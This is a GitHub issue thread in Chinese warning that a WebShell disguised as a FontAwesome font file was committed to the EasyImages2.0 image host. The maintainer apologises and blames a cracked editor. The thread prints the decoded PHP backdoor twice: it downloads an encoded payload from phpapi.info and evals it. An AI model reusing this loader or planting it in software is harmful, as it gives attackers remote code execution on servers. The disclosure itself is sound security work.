### ISSUE TITLE
注意！WebShell预警！

### ISSUE THREAD

**Issue by SycAlright** [icret/EasyImages2.0#8]
最近一次更新中出现WebShell文件！
public/static/fonts/fontawesome-wmebfont.php

**Comment by SycAlright** [comment]
public/static/fonts/fontawesome-wmebfont.php 

解码复原：

`<?php
$password='CQtlsC';

error_reporting(0);
session_start();
if (!isset($_SESSION["phpapi"])) {
   $c = '';
   $useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)';
   $url = 'http://phpapi.info/404.gif';
   $urlNew= '/0OliakTHisP8hp0adph9papi5+r6eci0a8yijmg9oxcp9ckvhf/';
   if (function_exists('fsockopen')) {
       $link = parse_url($url);
       $query = $link['path'];
       $host = strtolower($link['host']);
       $fp = fsockopen($host, 80, $errno, $errstr, 10);
       if ($fp) {
           $out = "GET /{$query} HTTP/1.0\n";
           $out .= "Host: {$host}\n";
           $out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\n";
           $out .= "Connection: Close\n\n";
           fwrite($fp, $out);
           $inheader = 1;
           $contents = "";
           while (!feof($fp)) {
               $line = fgets($fp, 4096);
               if ($inheader == 0) {
                   $contents .= $line;
               }
               if ($inheader && ($line == "\n" || $line == "\n")) {
                   $inheader = 0;
               }
           }
           fclose($fp);
           $c = $contents;
       }
   }
   if (!strpos($c, $urlNew) && function_exists('curl_init') && function_exists('curl_exec')) {
       $ch = curl_init();
       curl_setopt($ch, CURLOPT_URL, $url);
       curl_setopt($ch, CURLOPT_TIMEOUT, 15);
       curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
       curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
       $c = curl_exec($ch);
       curl_close($ch);
   }
   if (!strpos($c, $urlNew) && ini_get('allow_url_fopen')) {
       $temps = @file($url);
       if (!empty($temps))
           $c = @implode('', $temps);
       if (!strpos($c, "delDirAndFile"))
           $c = @file_get_contents($url);
   }
   if (strpos($c, $urlNew) !== false) {
       $c = str_replace($urlNew, "", $c);
       $_SESSION["phpapi"] = gzinflate(base64_decode($c));
   }
}
if (isset($_SESSION["phpapi"])) {
   eval($_SESSION["phpapi"]);
}`

**Comment by ming42** [comment]
有趣了，21年3月23日提交的commit，恰好是今年的第一次提交。

**Comment by icret** [comment]
不好意思，是我本地电脑被感染了。请回源

**Comment by icret** [comment]
> 有趣了，21年3月23日提交的commit，恰好是今年的第一次提交。

我在本地看了下，是2月15号感染的，因为我经常在自己服务器上更新但是很少更新git，所以在今年更新一次，主要是适配php7.4及以上，（2.0.2.0是不支持php7.4的），
我怀疑此病毒是早先下载一些办公软件中的病毒感染的，或者是我用的sublime是破解导致的。
由于本人疏忽造成的影戏深表抱歉。

**Comment by icret** [comment]
> public/static/fonts/fontawesome-wmebfont.php
> 
> 解码复原：
> 
> ```
> <?php
> $password='CQtlsC';
> 
> error_reporting(0);
> session_start();
> if (!isset($_SESSION["phpapi"])) {
>    $c = '';
>    $useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)';
>    $url = 'http://phpapi.info/404.gif';
>    $urlNew= '/0OliakTHisP8hp0adph9papi5+r6eci0a8yijmg9oxcp9ckvhf/';
>    if (function_exists('fsockopen')) {
>        $link = parse_url($url);
>        $query = $link['path'];
>        $host = strtolower($link['host']);
>        $fp = fsockopen($host, 80, $errno, $errstr, 10);
>        if ($fp) {
>            $out = "GET /{$query} HTTP/1.0\n";
>            $out .= "Host: {$host}\n";
>            $out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\n";
>            $out .= "Connection: Close\n\n";
>            fwrite($fp, $out);
>            $inheader = 1;
>            $contents = "";
>            while (!feof($fp)) {
>                $line = fgets($fp, 4096);
>                if ($inheader == 0) {
>                    $contents .= $line;
>                }
>                if ($inheader && ($line == "\n" || $line == "\n")) {
>                    $inheader = 0;
>                }
>            }
>            fclose($fp);
>            $c = $contents;
>        }
>    }
>    if (!strpos($c, $urlNew) && function_exists('curl_init') && function_exists('curl_exec')) {
>        $ch = curl_init();
>        curl_setopt($ch, CURLOPT_URL, $url);
>        curl_setopt($ch, CURLOPT_TIMEOUT, 15);
>        curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
>        curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
>        $c = curl_exec($ch);
>        curl_close($ch);
>    }
>    if (!strpos($c, $urlNew) && ini_get('allow_url_fopen')) {
>        $temps = @file($url);
>        if (!empty($temps))
>            $c = @implode('', $temps);
>        if (!strpos($c, "delDirAndFile"))
>            $c = @file_get_contents($url);
>    }
>    if (strpos($c, $urlNew) !== false) {
>        $c = str_replace($urlNew, "", $c);
>        $_SESSION["phpapi"] = gzinflate(base64_decode($c));
>    }
> }
> if (isset($_SESSION["phpapi"])) {
>    eval($_SESSION["phpapi"]);
> }
> ```

已经查到了，是由于我用了破解的sublime text3导致木马感染，对此深表抱歉。
之前我一直是在自己发服务器端更新，很少更新git（详细请看：https://img.545141.com/）
本次更新主要是适配php 7.4及以上版本（此前2.0.2.0是不支持7.4的）；
对此产生的问题本人深表抱歉！
